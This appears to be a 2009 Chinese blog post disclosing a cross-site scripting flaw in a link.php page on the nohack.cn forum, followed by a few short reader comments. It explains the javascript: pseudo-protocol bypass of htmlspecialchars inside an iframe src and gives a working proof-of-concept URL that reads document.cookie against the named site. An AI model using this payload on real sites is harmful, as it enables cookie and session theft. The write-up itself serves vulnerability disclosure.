首页 > 网络安全 > Nohack XSS

Nohack XSS

2009年7月31日 发表评论 阅读评论

link.php页面不是Dz论坛自带的,是nohack自己写的,虽然用 htmlspecialchars 函数进行处理了, php.ini配置里gpc也开了,虽然没办法通过闭合进行xss,但是nohack却忘记了javascript伪协议放在资源请求里面会被执行:

http://www.nohack.cn/bbs/link.php?link=javascript:alert(document.cookie)

页面内容:

<iframe id="url_mainframe" frameborder="0" scrolling="yes" name="main" src="javascript:alert(document.cookie)" style="height: 100%; visibility: inherit; width: 100%; z-index: 1;overflow: visible;"></iframe>

这种方式还是很多呀!!

转载请注明:woyigui's blog [http://www.woyigui.cn/]
本文标题:Nohack XSS
本文地址:http://www.woyigui.cn/2009/07/31/nohack-xss/

分类: 网络安全 标签: , ,
  1. randsafe
    2009年7月31日07:37 | #1

    鬼友最近学习什么呢?

    [回复]

    woyigui 回复:

    who are you ?

    [回复]

  2. sH
    2009年7月31日08:42 | #2

    顶!

    [回复]

  3. 2009年8月12日08:08 | #3

    呵呵,空气修复漏洞的速度还是蛮快的么~~~~

    [回复]

  1. 本文目前尚无任何 trackbacks 和 pingbacks.
*